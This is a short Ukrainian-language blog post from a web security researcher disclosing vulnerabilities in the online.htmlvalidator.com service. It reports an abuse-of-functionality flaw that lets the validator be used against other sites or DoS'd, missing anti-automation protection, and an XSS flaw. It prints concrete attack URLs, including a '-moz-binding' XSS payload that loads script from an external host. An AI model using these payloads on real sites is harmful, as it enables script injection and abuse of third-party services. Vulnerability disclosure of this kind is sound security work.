Websecurity - Веб безпека

15.07.2010

В липні, 06.07.2008, я знайшов Abuse of Functionality, Insufficient Anti-automation та Cross-Site Scripting уразливості на проекті http://online.htmlvalidator.com (що також доступний на домені http://www.onlinewebcheck.com). Про що найближчим часом сповіщу адміністрацію проекту.

Подібно до уразливостей на www.w3.org, дану Abuse of Functionality уразливість можна використати для проведення атак на інші сайти.

Детальна інформація про уразливості з’явиться пізніше.

08.12.2010

Abuse of Functionality:

http://online.htmlvalidator.com/php/onlinevallite.php?url=http://site

Даний функціонал може використовуватися для атаки на інші сайти. А також для проведення DoS атаки на сам сайт.

Insufficient Anti-automation:

В даному функціоналі немає захисту від автоматизованих запитів (капчі). Обмеження на один запит в 5 секунд з одного IP не вирішує задачу.

XSS:

http://online.htmlvalidator.com/php/onlinevallite.php?url=http://htmlvalidator.com/?%22%20style=%22-moz-binding:url('http://websecurity.com.ua/webtools/xss.xml%23xss')

Якщо XSS уразливість вже виправлена, то Abuse of Functionality та IAA уразливості досі не виправлені.

This entry was posted on 15:08 08.12.2010 and is filed under Уразливості. You can follow any responses to this entry through the RSS 2.0 feed.